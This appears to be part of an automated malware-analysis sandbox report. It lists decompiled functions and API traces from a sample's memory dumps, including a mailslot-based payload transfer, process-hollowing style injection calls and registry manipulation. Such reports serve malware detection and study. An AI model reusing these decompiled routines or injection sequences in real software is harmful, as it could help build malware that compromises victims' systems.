Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
